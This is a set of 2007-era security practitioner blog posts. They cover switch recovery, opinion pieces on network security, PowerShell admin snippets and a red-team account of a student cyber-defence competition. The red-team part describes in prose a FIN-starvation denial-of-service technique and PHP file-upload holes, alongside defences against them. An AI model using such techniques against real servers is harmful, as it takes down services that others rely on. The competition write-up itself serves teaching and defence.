1. If DHS is attacked and they have someone to blame such as a contractor who should be taking care of things, the blame can and likely will be shifted, rightfully or not. This basically means the "information age" is not just surging along and pulling culture with it, but business culture is requiring information be saved and documented to avoid he-said-she-said crap. So unless Unisys goes the proverbial extra mile in the contract and also documents all deviations or obstacles, and because security will always eventually fail, there will always be a scapegoat. And blaming everyone else for responsibility for things is a hallmark of the 90s and 00s. (All starting with the McDonald's woman who spilled hot [no shit?!] coffee on herself and successfully sued.)

2. The government is opening up competing bids for the contract. That means we have a major differentiator being cost/price. And we all can guess how the quality of security may follow the line of price. Lowest bid will almost certainly ensure the security is also of lower quality.

Holy crap 9600 baud is slow! I'm doing something different in loading a wiped switch, and I thought I would use an xmodem transfer. Go me! Since this is taking so long, I may as well post some switch basics as I go. (To note, my earliest speeds on the Internet were 14.4kbps modems back in high school.) I'll also go ahead and put on some background music, the excellent Dubnobasswithmyheadman album from Underworld (a favorite!).

I have a completely wiped Cisco Catalyst 2950T switch. Even the flash has been erased (an eraser of love). If you boot it up, it gives an error and stops pretty quickly. A quick "dir flash:" will show nothing. I also have an ios version ready and waiting: c2950-i6k2l2q4-mz.121-22.EA8a.bin. For my console system I have an old Dell Latitude laptop (yeah, it's one sexy-small laptop!) running a permanent install of BackTrack2.

To get the c2950-i6k2l2q4-mz.121-22.EA8a.bin file to BackTrack2, I decided to also test my tftp server and use tftp to transfer the file. My tftp server is at 192.168.10.108.

tftp 192.168.10.108 -c get c2950-i6k2l2q4-mz.121-22.EA8a.bin

Gosh, that's easy. Now I need to connect up to the switch by plugging in necessary cables, including the power so that it powers on and loads. I decide to use CuteCom in BackTrack2 as my graphical terminal emulator. I change the baud rate to 9600 and click Open device. I type a few commands to get ready for my transfer.

switch: flash_init
Initializing Flash...
...The flash is already initialized.
switch: load_helper
switch: copy xmodem: flash:c2950-i6k2l2q4-mz.121-22.EA8a.bin
Begin the Xmodem-1k transfer now...

At this point the terminal is waiting for some data. CuteCom has a Send File button at the bottom where I can select the file and start transferring at the blistering 9600 speed! In fact, after writing this, I'm still only up to 15% completed. Ahh the joys of a wiped device that doesn't even know what an IP address is yet.

Emulate some Cisco routers on your laptop using Dynamips. This looks awesome! From Andrew Hay.

Ever read an article that makes you kinda stop anything else you're doing as you try to make sense of it? Then read it again, which doesn't help...then read it in bits and pieces to see if you can make sense of the parts in order to tackle the whole? And then maybe still wonder what sort of crack the author is on? I had that this morning reading an eWeek article, Analysts Predict Death of Traditional Network Security. I guess there's a reason I didn't re-up to eWeek a few years ago. And it is just coincidence that the topic is de-perimeterization and mentions the Jericho Forum, I swear!

According to them, in the next five years the Internet will be the primary connectivity method for businesses, replacing their private network infrastructure as the number of mobile workers, contractors and other third-party users continues to grow.

...So the Internet is not already a primary connectivity method? I guess I underestimate the Frame Relay and dedicated links market dramatically!

One of the end results of the death of traditional network security will be a growth in desktop virtualization, Whiteley said.

Hey, that's kinda cool to read. In fact, we're right now doing some desktop virtualization for mobile employees, particularly developers offsite. They VPN into our network with a system, then Remote Desktop into a virtual machine on our network upon which they work. Odd...I never once thought of this approach as being part of de-perimeterization or the death of the nebulous "traditional network security." It's a way to avoid bandwidth restrictions and data egress.

Desktop virtualization allows a PC's operating system and applications to execute in a secure area separate from the underlying hardware and software platform. Its security advantages have become a major selling point, as all a virtualized terminal can do is display information; if it is lost or stolen, no corporate data would likely be compromised since it wouldn't be stored on the local hard drive.

And this is where we finally stop toeing the brakes and actually put some pressure down on the pedal. I don't think the author was involved in something called terminal/server architecture before, since that's what he decribed. He did not describe desktop virtualization. Maybe we're seeing the bastardization of terms...which is unfortunate. There is a point to be made about moving to virtual desktop systems and also moving back to terminal/server setups, but it really has nothing to do with de-perimeterization or the use of the Internet to connect businesses. It has to do with support costs, desktop OS compliance activity, and data security. All of which are vague and ubiquitous enough to "support" pretty much any security theory or initiative. Part of my religion is predicated on you breathing regularly. If you breathe regularly or believe in breathing, then you support my religion. Um, no.

The adoption of PC virtualization would mean companies would no longer have to provision corporate machines to untrusted users, Lambert said. Desktop virtualization simply equals a more secure environment, she said.

Hrm, I don't follow that reasoning at all. In fact, this is a three-punch combo in confusion. People provision computers to untrusted users? Desktop virtualization means you don't have to provision anything now? And somehow that makes things all more secure? I'm feeling nauseous...

I think the author and the people quoted in the article (Forrester analysts) need to take a step back and iron out what they mean by desktop virtualization and how that compares to the age-old terminal/server environment, and move forward from there. But some of these conclusions just don't follow, and the muddiness of the terms and logic makes the article a waste of time.

The other day I posted about Unisys and the DHS. After seeing a post from Bejtlich, I see they're fully wading into it together. Ugh.

While I won't defend Unisys, I'll play Devil's Advocate for just a moment. Was Unisys just providing the systems and process and DHS was meant to actually put things into operation? And I wonder if there were any obstacles imposed by DHS that prevented things like IDS systems being implemented? I know it can be a pain when you're asked to install ABC onto 45 systems, but half of them keep telling you they're too busy and to try again next week.

It obviously sounds like Unisys made some really poor decisions, but I'm curious on the extent of them from Unisys and from DHS itself, if any. Thankfully, this is the transparent government and not private companies, so we get to watch the laundry shake violently in the wind.

This image of the Linux file system is extremely cool! I think I'll print a few copies out and put them next to my computers. Layouts are one thing, but to make a useful one with some instruction on what some of the more esoteric section are is excellent!

There is an interesting discussion this week on the Full Disclosure mailing list about the definition of "0day." Oddly, what seems like an old term is definitely not a term with an understood and universal definition. It seems to vary widely, dramatically widely. Then again, FD is a fairly argumentative list with some people arguing anything just to argue. Still, it is interesting the lack of clarity in some of our widespread terms.

My take on 0day, which I've used ever since I first heard the term many years ago, is pretty much the same as the Wikipedia entry. To me, a 0day is an exploit released before solutions or patches have been diseminated from a vendor. This wouldn't mean a new strain of a virus exploiting a known vulnerability would be a 0day. But a new worm exploiting a new vulnerability would qualify. A side effect is whether something is a 0day to someone who has seen it, and provided for a workaround, even though they're not the vendor. To me, 0days are somewhat unstoppable exploits, mitigated by defense in depth / layered defenses.

And don't even bring up "less than 0day," as I feel dumber each time I hear that term...

Cutaway has an excellent interview up with Michael Farnum who talks about his experiences with companies in regards to a number of things, namely logging. Does he see companies logging, are they doing it properly, and so on. Excellent insight into what's really going on, and not as untrustworthy as a sheet of stats from some vendor with an agenda.

In reflection to the questions and answers, here some of my bullet points when it comes to centralized logging discussions.

1. The IT team needs to see value in the process of logging and reading logs. If they don't see value, they either won't do it, won't do it properly, or have no clue how to leverage it. If they don't see value and the business sees no value, it just plain won't get done. This probably always ends up not being a security value-add, but rather an operations one. Something went wrong with a web app, can you troubleshoot it by looking at the logs? Or a server isn't updating properly from WSUS...and so on. Logging should be seen as important as a heart monitor on a patient in the hospital.

2. Once there is value, or maybe even before the value is realized, admins need the time to properly get things set up. Having enough time to gather Windows event logs and nothing else is going to be a wash. Same with just gathering the logs on half your firewalls. Give the team enough time to properly get things going.

3. Set aside time for the admins to regularly look at logs and maybe even "play" with the logging server. If admins don't have time or are not allowed to use the logging reporting and querying regularly, they won't have the familiarity to do it when emergencies or high profile incidents arise. Practice, practice, practice.

4. For the love of whatever, read Anton's paper(s) about the six mistakes of logging.

My own logging? At home, I don't do enough. At my last job, we did logging, but didn't use it enough or probably use it properly. At my current job, we don't do enough logging at all.

It's not often someone hits a pet peeve of mine dealing with security, but I bristled at one just now.

One of my tenets of security is to make sure to not believe there is a silver bullet or security panacea. I think we universally believe that.

But there are insinuations and beliefs that, in a way, are saying there really is a silver bullet. Most of these have to do with saying "Security measure X is not 100% effective, therefore it is useless/inefficient/expendable."

I've seen this with Jericho Forum defenders who say the perimeter is porous now, which must mean the firewall is less efficient, which must mean we're moving towards no perimeters. "What use is a perimeter defence with holes in it after all?"

Such a statement is analogous to saying, "I expect my security measures to be silver bullets."

I don't think I've stumbled downhill nearly that violently since breaking my leg sledding one winter...

I currently don't do much desktop work right now, but it is still nice to see how a system compares to various standards. I'm not sure where I picked this up yesterday, but I got pointed over to a tool, Secutor Prime, which examines a system and compares it to various standards such as the FDCC. The best part of this tool is the feedback. Clicking on any check will give the findings and also the steps needed to pass that particular test. An excellent means to learn more about desktop security, the settings, and what compliance checklists look for.

RainForestPuppy (one of the coolest names ever) wrote a memorable memorandum a few years ago. I've mentioned it before. That memorandum holds a special place in my mind, and I'd definitely buy this guy a few drinks if I were to ever meet him.

Infiltrated recently posted an "interview" with RFP.

I recently decided I needed to use Google Talk. I don't know why, but I have Gmail accounts, so why not buddy up to Google Talk? I use Pidgin 2.0.0 on my Ubuntu 7.04 laptop. Unfortunately, I was having no luck getting XMPP (Google Talk) to connect properly. An upgrade to 2.2.0 is in order, right? Unfortunately, nothing exists in the repositories to upgrade Pidgin. Great! When I did the following steps, I did not have to remove my old Pidgin installation, and all settings and buddies were carried up just fine.

First, I need to update my repositories list:

sudo gedit /etc/apt/sources.list

with:

deb http://repository.debuntu.org/ feisty multiverse
deb-src http://repository.debuntu.org/ feisty multiverse

Then run the following commands:

wget http://repository.debuntu.org/GPG-Key-chantra.txt -O- | sudo apt-key add -
sudo apt-get update
sudo apt-get install pidgin
sudo apt-get install pidgin-libnotify

After this, Pidgin can be started from Applications -> Internet -> Pidgin. Once the app has started, I want to connect to Google Talk. Accounts -> Add/Edit -> Add -> Google Talk.

My protocol is XMPP by default. Screen name is my Gmail login. Domain is gmail.com. Resource is left to the Home default. In the Advanced tab, I checked Require SSL/TLS, chose a connect port of 5222, and connect server talk.google.com. I left the Proxy type to Use GNOME Proxy Settings.

References
installing pidgin 2.2.0
connecting to google talk

Bejtlich slammed out a bunch of posts late last week which I'm still wading through. Excellent food for thought for a whole week or more! I just wanted to jot a few thoughts of my own down, fairly unformulated ideas...

Cyberinsurance. It really does make sense on paper, no? And it's one of those things we look towards like the sun peeking from the clouds in the distance as we're still getting poured down upon; there is an end!

Sadly, it's not a perfect solution. IT is spendy. Unlike fire insurance measures which may just include inheriting whatever the builders built plus marking exits with placards and posting occassional fire extinguishers, we inherit insecure building blocks and have to do a hell of a lot more to detect and monitor while also providing IT services to the business. That's a very different magnitude.

Fires happen, but not very often. Cyber attacks may not happen to your business very often either, if at all, but they certainly seem to occur on smaller scales very often. Viruses, worms, snarfed credentials, file loss through P2P. While this isn't like a fire that destroys a building, IT security is more like lots of little fires that can pop up every week in various corners.

Likewise, what if it were profitable for people to set fires to your building? And they could set fires without being physically present? And have little chance of being caught unless the fire gets way too big? I think we'd see lots of fires and fire insurance would have some pretty deep questions to start asking itself.

When a fire occurs, there are professionals trained to examine and determine fire causes. These causes, with extremely exotic exceptions, should be fairly finite and predictable based on the operations that take place in that building. Negligence can be supported with building specifications, local and federal laws and standards, and inspections based on specifics. IT is far more wide in the spectrum of choices, tools, implementations, and so on. There are best practices for things like a Windows shop, but relatively few people know them fully or pursue certs that would help solidify them.

Maybe cyberinsurance will be a way to show compliance? For instance, you do measures X, Y, Z, and part of G, and you won't have to pay all that much more in premiums. Of course, how much do those measures cost compared to the savings? Taking this a step further, how is this very different from the much-maligned "HackerSafe" logo on websites? As an industry (and the media, and thus average people, and thus culture), we're very intolerant of single failures. This might be because single failures can affect millions of people in ways we probably don't even know about yet. Or it might be because it's all so very dramatic yet... Laptop theft has existing since there have been laptops, but it seems like more now because of the disclosures requirements...

Insurance also seems to be something people buy to protect against things outside their control. Attackers and other digital shenanigans are maybe not so much seen as random or natural acts, but rather things we can control. Why buy cyberinsurance when that money can be spent on the IT/security infrastructure? We still have a lot of ways to become more secure, whereas insurance seems to me to be something you buy when you're out of alternatives and need a safety net.

Cyberinsurance sure sounds good, but I wonder if our current state is going to upheave such an insurance model in the same fashion that technology is unheaving our idea of copyright and privacy.

Anyway, just some thoughts for me for the future, nothing solid or much that I'd back in a challenging discussion, yet. :)

I saw via Bejtlich that InformationWeek has an excellent article up about Robert Moore, the hacker who, a few years ago, broke into quite a few telecom (and likely other) organizations to route and steal VOIP.

The article continues to pound home that we're doing the simple things very badly. And we have no friggin' clue when someone malicious is doing things inside our network. Here's some meat, though:

"It's a huge problem, but it's a problem the IT industry has known about for at least two decades and we haven't made much progress in fixing it," said van Wyk. "People focus on functionality when they're setting up a system. Does the thing work? Yes. Fine, move on. They don't spend the time doing the housework and cleaning things up."

That's really a huge part of the problem, isn't it? Implement VOIP, and hope that you get time to get back to it later to evaluate the security before your next big projects come up. And so on.

Really, I feel that this problem is twofold. First, we're still maturing in our grasp of technology. Unfortunately, and *naturally,* the attackers are maturing faster. This happens in biology as well, so we need to accept and expect it as a given. Second, having the time and resources to either do the job correct up front or revisit the job later and fix it up.

This ran across my Art of War calendar today, and makes a good statement about detection/logging, which is still being undervalued in today's organizations.

What everyone knows is what has already happened or become obvious. What the aware individual knows is what had not yet taken shape, what has not yet occurred. Everyone says victory in battle is good, but if you see the subtle and notice the hidden so as to seize victory where there is no form, this is really good. Chapter 4: Formation

I was scrolling through the latest Insecure magazine (did they get swallowed by net-security.org...?) and saw an ad on the very last page for o3 magazine? Huh? They appeared to be inactive earlier this year; in fact, their web site disappeared.

I checked the site and sure enough, they're not just back, but back with lots of content. Issue 6 and 7 were released in August 2007, and Issue 8 and 9 just came out for Sept 2007. Weird, but welcomed!

I wasn't going to post about the recent vulns released about Axis 2100 IP cameras. They are neat vulns which illustrate dangers that XSS and CSRF can bring to devices with web interfaces or how even internal sites can become exploited grounds. I especially like that you can replace a video feed which you always see so effortlessly executed in movies. I really like the vuln where viewing the log files will execute javascript; which reminds me of a recent WS_FTP DoS that works in similar fashion. There are a couple videos out there showing off the exploit. Both links are in the paper (pdf).

No, I wasn't going to post it because I figured it would get covered well enough anyway. But then I read the paper. And on one of the last pages of the paper is the real meat that made me think, "Aw yeah!" The authors describe how they were able to glean enough information from an Axis development wiki to probably compile their own tools. Whoa, this just went to another level! Axis may not support this particular device anymore, but if people can successfully compile and upload tools into this device, we could see a resurgence of popularity that may mimic (in smaller scale) the popularity of Linksys' WRT54G wireless router.

I really think Axis could take advantage of this interest and help anyone looking to build tools. I mean that seriously...if they decide to open source it more...

Getting a list of all the sites in IIS 6 is typically as easy as right-clicking Web Sites and choosing Export List. I decided I wanted to do this through PowerShell. I'm sure there are plenty of ways to do this, but this is one I got to use today.

$objSites = [adsi]"IIS://serverorlocalhost/W3SVC"
foreach ($objChild in $objSites.Psbase.children)
{ $objChild.servercomment }

This should output all the names of the sites that you would see in the IIS management console. If you want to know what else can be pulled, grab one of those objects and pipe it to get-member. I haven't figured out how to pull the Home Directory, but IP should be under .ServerBindings, the ID should be under .Name, and so on. I suspect IIS7 will be even easier to manage via PowerShell.

Adam over at EmergentChaos posted this blurb, which I'm also going to quote, in regards to an Accenture data loss incident:

Connecticut hired Accenture to develop network systems that would allow it to consolidate payroll, accounting, personnel and other functions. Information related to Connecticut’s employees was contained on a data tape stolen from the car of an Accenture intern working on an unrelated, though similar project for the State of Ohio. (The tape also contained personal information on about 1.3 million Ohio residents.) The intern apparently had been using the Connecticut program as a template for the Ohio project.

Holy shit, do I hate when developers insist on using protection data in development environments. It is amazing how difficult that fight can be to get them to use test data, or to take production data and thoroughly scrub it on the first copy down. Of course, later on they want "refreshes" downward, or they start sharing amongst themselves when one wins the fight for their project...

Couple that with the fight to allow them to put such data on their laptop, and you get a lot of bad blood pretty quickly over just two out of a gazillion issues.

It is going to be very important in coming years that companies who allow their data to be used by someone else will want written statements about who has access to their data and where. Will it be on development systems in the squishy internal network, or available for an intern to query out and take home? Can you provide names of everyone that will have access? If you have any DBA duties, start preparing for this storm now! These questions are being whispered now*, but often aren't taken too seriously...yet.

1- Know who has access to what data, including queries as well as full database access.
2- Provide a process for requests and approvals for access to databases.
3- Know who ran what and took out what data. If an intern pulls a bunch out, you better well know it when they do. Know how to pull those logs and massage them for the answers.

These are just a few basic management questions that, if not answered, will leave them in a position to make uninformed decisions and actions.

As a side note, other questions are being and should be asked about the whole lifecycle of that data when it leaves the nest. Is the transmission of that data secure (SFTP, FTP, Web, Email...)? Is the first stop for that data secure and/or temporary (your contact's email box, the ftp server...)? How does the data get to the desired location or is it kept somewhere internally before being used (uploaded to a file server, sits in someone's PST file, gets backed up to tape from the ftp server...)? When at the end location (database, hopefully), who has access to it? When the work is done or the contract terminated, what is the data removal process (tapes, servers, databases, official backups, backups the developers have made...). Yes, it's more than the DBA, but really the easiest place to start is with the DBA duties.

Oh noes, I'm in LinkedIn. Those of you who have bugged me...ok, ok, I'm digging it. I like that only people in my "network" get to see anything worthwhile about me. Anyway, if you read my blog at all and are in my network, chances are you're "ok" to add, so feel free to find me, Michael Dickey. Or email/comment and I'll find you instead.

Finally getting around to watching DefCon videos, and I started out with Bruce Potter's Dirty Secrets of the Security Industry presentation. I've seen recordings of Bruce Potter talks before at ShmooCon, and I've enjoyed his presence. Definitely a cool guy with a lot of passion for the industry, and I think he's open to creating discussion, even if he knows he's wrong and just trying to get everyone to think. I can't help but admire that! Here are some notes, followed by reactions of mine. I definitely recommend watching this talk. Everything in blockquotes are paraphrases or quotes lifted from the slides and presentations.

Bruce opened by talking about some foundational concepts and history of security. He made a point to show that security is still growing and making more and more money. He then went into his dirty little secrets.

Secret #1 - Defense in Depth is Dead - The problem is in the code. We've always had bad code. Fix the code. Firewalls don't help things that have to be inherently open, like port 25 to the Internet for the mail server. Spending way too much money and time with defense in depth! Need type safety (programming), secure coding taught in schools, and trusted computing. We need better software controls on our systems, not better firewalls.

I'm hearing a lot more about this lately, about how we need inherently secure systems and devices and protocols. :) All his points are good, and I really don't oppose outright a viewpoint like this. We need better training for software developers and we really do spend a shit-ton of money on more and more defenses that are band-aids to deeper problems.

However, I don't think defense in depth is dead. I think he has great points, but I'd throw a shmoo ball at him for the sensational title of the secret. :) We're humans, and humans are producing code. It just takes one incident (which he says in a later slide) and defenses can break. That's the point of defense in depth. Not necessarily about band-aiding insecure code, but rather ensuring that 1) we account for mistakes and unknown holes, and 2) we make sure attackers have to really try, or collude, or take a lot of time. If I can solve issue GER, and that's your only defense, I win. If I have to solve issue GER plus LIG, I'm stuck...or I have to find help or spend more time breaking in.

This defense in depth approach only makes it *look like* we're just band-aiding insecure code, which we kind of are, but that's just an ancillary issue. To put it better: it's an arguable position. (Marcin, if you're reading this, yes, I use these $10 words all the time!)

Secret #2 - We are over a decade away from professionalizing the workforce - Much of our jobs is learned through self-education, not professional education centered around security. How do we codify and instruct the next generation? Security is everyone's problem...because no one really knows how to properly do it. We can't train all our professionals, how do we expect to train all our users? Users need tools that they can't screw up; that don't require education to be used securely. Years and years away from making this better.

A-fucking-men. First of all, he's got a point about not being professional yet. I went to school and got an MIS degree, which is, in effect, Comp Sci Lite. Did I get any information about security? Not a bit. Hell, I was barely prepared for a real technical job...I was more prepared to be a clueless analyst than technical. Bruce is absolutely fucking right that we're almost all completely self-taught, either on the job or on our own. That's not a professional workforce or industry. Not yet anyway.

I love his mention that security is not everyone's problem. I love his mention that users don't need training, they need tools they can't fuck up. Absolutely! Likewise, if we pour a bunch of money into training, and an idiot or new user shows up and makes a mistake, all of that is wasted. We need the technological controls, and we need the secure systems, and we need the simplicity more than we need high-end training such that security can be everybody's problem. That's not to say I'm all about de-perimeterization!

But that gets back to defense in depth. Users will make mistakes, which is also what defense in depth helps to mitigate. Yes, I think the industry has gone overboard and yes, we spend way too much money on many levels of defense, and we need to start spending that money smarter, on better defenses, and more secure foundations. More on that coming up...

Secret #3 - Many of the security product vendors are about to be at odds with the rest of IT - The security industry has sold a lot of defense in depth; a lot of money that isn't going to securing the foundation. Bruce uses Microsoft as a case study: Microsoft tries to make a more secure foundation, but then the vendors start complaining, and Microsoft has to bend and allow unsigned driver interaction.

Excellent points. In fact, this is an issue in more than just security. Lots of money are being spent on software and systems and security, and we're starting to question, "Why?" "Why did I spend XXX on 3 years of software assurance for MS SQL Server, when no new product came out from 2000 until 2005?" I have used the example of Microsoft trying to secure its own product in the past, because it dramatically illustrates how our landscape has changed, and how the maturation of the security industry has agendas to protect. I've been saying that Microsoft can't just out and create a secure OS anymore. The vendors won't let them. They'll have to do it slowly, like boiling a lobster.

Defense in depth may not be dead, but he has a point that we really are spending too much on it.

Secret #4 - Full Disclosure is Dead - There is too much money to be made in selling bugs; even companies are paying for vulnerabilities. We want to make live systems more resilient to attack, but this market for vulns means those companies are (potentially) profiting at the expense of the end user.

Again, very true, and that last sentence I don't think I had realized outright before this talk. I still believe in full and/or responsible disclosure, but at least now I have some logic behind the bad taste those "pay for my vuln" scams leave in my mouth.

Bruce quickly closed out by re-emphasizing some of his suggestions:

Recognize that the landscape has changed. Push vendors to make products that actually create a secure foundation, not just more layers. We need to create a more formal body of knowledge for info security, and hold each other accountable.

This is an excellent talk, and I really love what he brings to the table. He wants to stir things up a bit, open discussions, and maybe even be wrong. But that's the sort of openness we need to keep striving for. He had a real brief mention about being open and sharing information rather than bottling it up to sell in a non-disclosure vulnerability; to not stand in line politely but to keep the energy we know we have when it comes to toeing the line. I can only imagine how a group conversation at a bar can likely last all night long about this stuff!

For my own future reference, SANS has posted a bunch of links dealing with Cyber Security Awareness.

Richard Clarke recently spoke at a conference and listed five steps to save the Internet. Here is a brief on the five steps:

1. National biometric ID
2. More government oversight of the Internet
3. Nonpartisan government oversight to protect privacy
4. Secure software standards
5. A closed Internet for critical services like the power grid

1- I don't like the idea of a national ID or using biometrics, but I do know that social security numbers are antiquated and broken. They're just not working anymore in our ultra-efficient information age. I agree change needs to happen; I don't know what solution I would like. Something similar to what all the cyberpunk visionaries have written about for decades is most likely inevitable. An inevitable evil. I've long felt that a major hurdle for the Internet deals with identity; trusting it and verifying it. And no, I don't think OpenID is the obvious solution.

2- I don't like this either, and hopefully it won't happen; but I am surprised ISPs and the Net have held out this long and this well. Hopefully it stays that way.

3- Maybe I'm old-fashioned already, but isn't privacy oversight covered by the judicial branch?

4- This is obvious that we need better standards. Is the government the proper standards-bearer? I doubt it, and I definitely wouldn't hang my hat on getting this done enough to make an ultimate difference. It will help, as part of a blended improvement to cyber security and software security.

5- Hrm, again, I might be old-fashioned, but I call this either a private network or a network with strong perimeters and controls. I think Clarke is looking for attention and media drama by calling it a closed Internet, but I don't think that's what he's really meaning to talk about. Why do you need a closed Internet and how is that different from a private WAN network? Open access to the web and other services? You mean like the walled garden from AOL? I'll dismiss this point because it is just bait and hype, nothing more.

For a script I have that maintains our systems and installs new versions of our web code, I have the occassional need to also reboot a server during after that install. Like most things programming, there are several ways to script a reboot.

This first example (my preferred method) reboots a remote system.

$objServerOS = gwmi win32_operatingsystem -computer servername
$objServerOS.reboot()

Leave off the "-computer servername" to reboot the local system.

This second method is similar. The following lines will reboot the local system, force the reboot of the local system, or reboot a remote system.

(gwmi win32_operatingsystem).Win32Shutdown(2)

(gwmi win32_operatingsystem).Win32Shutdown(6)

(gwmi win32_operatingsystem -ComputerName Server).Win32Shutdown(6)

Here is a list of the codes that can be used.

0 -Log Off
4 -Forced Log Off
1 -Shutdown
5 -Forced Shutdown
2 -Reboot
6 -Forced Reboot
8 -Power Off
12 -Forced Power Off

Pipe $objServerOS or (gwmi win32_operatingsystem) to Get-Member to see more goodies.

There is a good chance the above commands will error when trying to do a reboot, complaining about privileges not held, even if you're running as admin. Add a privs enable line in between the above two, and it will process just fine.

$objServer = gwmi win32_operatingsystem
$objServer.psbase.Scope.Options.EnablePrivileges = $true
$objServer.reboot()

Michael has Friday off. Michael has the day off because he will be attending Iowa State U's 3rd (?) annual CyberDefense Competition as a member of the Red Team. Michael would link to the site, but even his Google-fu is not yielding up a currently active site. This CyberDefense Competition hosts teams of college students trying to run servers and systems in a hostile environment for over 24 hours. Michael anticipates having a fun time and likely learning far more than he is able give.

This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

This weekend Iowa State University held its annual CyberDefense Competition in Ames, Iowa. The event is hosted by students and faculty from the Information Assurance Student Group and the Electrical and Computer Engineering department. In the event, teams of students attempt to deploy and manage various services representative of normal business applications. During the 20 hours the event covers, the teams are scored on their service uptimes as tracked by network monitoring (Nagios) and other neutral teams acting as normal users of the services. In addition, much like the real world, there is another team of students, faculty, and area professionals acting as attackers, intent on owning and bringing down those offered services. The services the teams were required to offer were web services (with pre-packaged web content), mail (smtp and imap), a telnet shell, ftp, wireless access for normal users, and dns to get it all working.

The teams are made up of regular students, I believe mostly for class requirements in a couple classes. There were 15 teams ranging from what looked like 4 members up to maybe a dozen. The students have had time in advance to plan and implement their services. To illustrate the aptitude of the teams, at the start of the event only about half the teams had their services up and running. Even through the course of the night, not every team was having success getting services up, while other teams were more advanced and running ipcop, pf, iptables firewalls, and hosting services on Linux or even MS Exchange on down to SquirrelMail or IIS mail. This illustrates the widely varied skill levels in these teams. Some teams had everything choked down behind a firewall while others had disparate boxes sitting on public IPs and others were having problems with DNS configs.

The "world" for this event is a bit interesting in itself. The teams were allowed to use publicly routable IP addresses because the event was hosted in the Iowa State ISEAGE system. ISEAGE (Internet-Scale Event and Attack Generation Environment) is a mostly closed network that simulates the Internet on a small scale to model attacks and other research activities.

At the end of the event, teams were scored and a winner announced, but more important are the lessons learned from the event itself. How difficult or easy is it to put up and manage services for a business, attent to the needed systems, and react to security events. What works and what didn't work. Hopefully everyone went away feeling at least a bit more enlightened about the world of professional IT, no matter what their end performance in the event itself.

On a more personal note, I certainly wish I not only had more interest in the field of networking and security when I was in college, but I also wish we had these kinds of groups. I graduated in 2001 with a degree in MIS from ISU, but I never had any security courses (and almost no security emphasis in programming or other classes) and my only networking exposure came in my last semester. I graduated having never really installed an operating system or upgraded one, nor knowing much of anything about normal business services and technology. I'm amazed where I've come since then, and I'm amazed that college studies are starting to catch up to the real world of IT and out of the academic "let's just teach everyone C and theory" practices. A competition like this where students install and work on these services is downright invaluable, even to those who didn't successfully get services running. IT is so much about doing things, not about sitting in a classroom and listening to a lecture about the theories.

This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

Observations on cyber security
- Web application attacks and web site defacements are fun and tend to gather attention, from attackers and onlookers alike. Sadly, such attacks first of all don't bring services down, and so don't penalize teams all the that much. Secondly, they result in little gain for the red team; a short-lived, and very public victory that results in no root access, no further gains, and most likely closed vulnerabilities.

- Network and OS attacks are or have gone out of style, even against systems that have their balls left hanging out into the public network space. Several ripe systems survived a long time while people tinkered with web app vulnerabilities. Beyond nmap scans, I saw very little network twiddling or system/service attacks. This may mean over the next few years, organizational network security and hardening may atrophy as everyone focuses on the web and clients.

- The perimeter is still a battleground, wherever it may be. One team was rumored to be running ipv6 on their inside network, which would have made things interesting for the Red Team had we ever gotten inside that network. Unfortunately, most efforts were spent pounding and poking the external surfaces and not cruising the internal networks. Note that while a web server is part of the perimeter, it has several exposed layers: application, server app, OS. And someone wants to say defense in depth is dead?

- A majority of the time spent by red team members was exploiting holes in the web apps. There were several openings to upload files and execute php code on the web servers. Unfortunately, once these attacks became apparent, such holes were closed and access very limited. Some teams opted to break upload capabilties, others removed such sections from their site, and others were more correct by not allowing specific php executions or overwrites. Some teams left their /etc/passwd file exposed to such attacks, but all cases had shadowed passwords. More defense in depth...

- Doing the fundamentals greatly increases survivability on the Internet. Put up a firewall and make sure your perimeter doesn't leak information or have excessive holes. Keep patches up to date on systems and services. Change default passwords and accounts. And after those are done, then pay some special attention to the users such services run under, the web applications, and the web servers. I can see why network attacks are being eclipsed by web-based attacks because the ability to secure web apps requires an amazingly huge skill set and experience/knowledge. Do you know how to securely write interactive php apps running on Apache such that they hold up to attacks? That's a job in itself for more than just one person to administer. Once the fundamentals are taken care of, it really takes a special attacker to make headway into your network. Do they have 0day exploits for your patched services, or the ability to create them? It really does take special skills to do that. I think only at the DefCon CTF competition might there be such expertise in an organized competition. If you get the fundamentals down and your web apps and servers are solid, start changing service banners to really raise the bar for attackers. The fundamentals are money in the pockets of your company.

(A side note, that not every IT person knows the fundamentals, even today. A lot of these students went into this competition missing the fundamentals, and many more will leave the program without a firm grasp of them. LEARN THE FUNDAMENTALS!)

- For the love of God, make an attacker's life difficult. Make the firewall not respond to closed ports. Make my nmap scan take a long time and throw everything back at me as filtered. Make me earn my scans. Make sure egress on the firewall is strictly configured so even if I do get something planted, it might not be able to call back (and will be exposed in the logs).

- Read the fucking logs. Wow. Once a server is up and running and a service is being used, tail all the logs. The logs will reveal who the attackers are and what they are probing. Especially those web app logs! Typically once a vulnerability is found, the one red team member exclaims his find and the other 14 members of the team clamor over to see it themselves. Suddenly a ton of hits on a seemingly normal part of the site may be cause for alarm. And after an incident does occur, those logs are your survival. You can put a defaced site back up, but it will just get owned again. Check the logs and close the holes, either by changing the code, removing the offending pages, or adjusting server protections to disallow certain things.

- Similar to logs, it can be amazingly insightful to have an outside packet logger or IDS system hanging off the external interface of the perimeter. Even a DoS against the firewall can be detected and seen and diagnosed and fixed with such data. Without this data, a few teams were left wondering why their service seemed down. They looked at the service and box it was running on rather than the firewall on the network.

Coolest attack
The most interesting attack I saw was actually a DoS attack. The attacker called it a reverse LeBrea attack, although it could be called tarpitting a server or FIN starvation attack. In it, the attacker opens hundreds of valid TCP connections and then begins the teardown sequence by sending an ACK/FIN packet. The server responds with an ACK and its own ACK/FIN packet, and then waits for the final ACK response from the attacker. The attacker, however, does not send that ACK packet back, which keeps the server's connection open. Nicely enough, the server itself is not very busy since it is only waiting for hundreds of open connections to end. This can be eliminated in numerous ways such as detecting DoS attacks and adjusting the firewall to block after a threshold of connections have been made, or by aborting out of TCP teardowns or lowering the wait time. Iptables is susceptible to this unless steps are taken to correct the behavior.

Some false lessons
While lots of lessons and insight can be learned, there are some red herrings and false lessons that hopefully no one takes away.

- Applications are not always secure. Almost every team was running fairly new versions of their applications and systems, from new phpBB and SquirrelMail implementations to new Ubuntu boxes. While it might seem impregnable today, will it be impregnable in a year in a company with poor patch management? Nope. Those little applications like a wiki or phpBB can quickly draw cold sweat on the necks of IT admins...

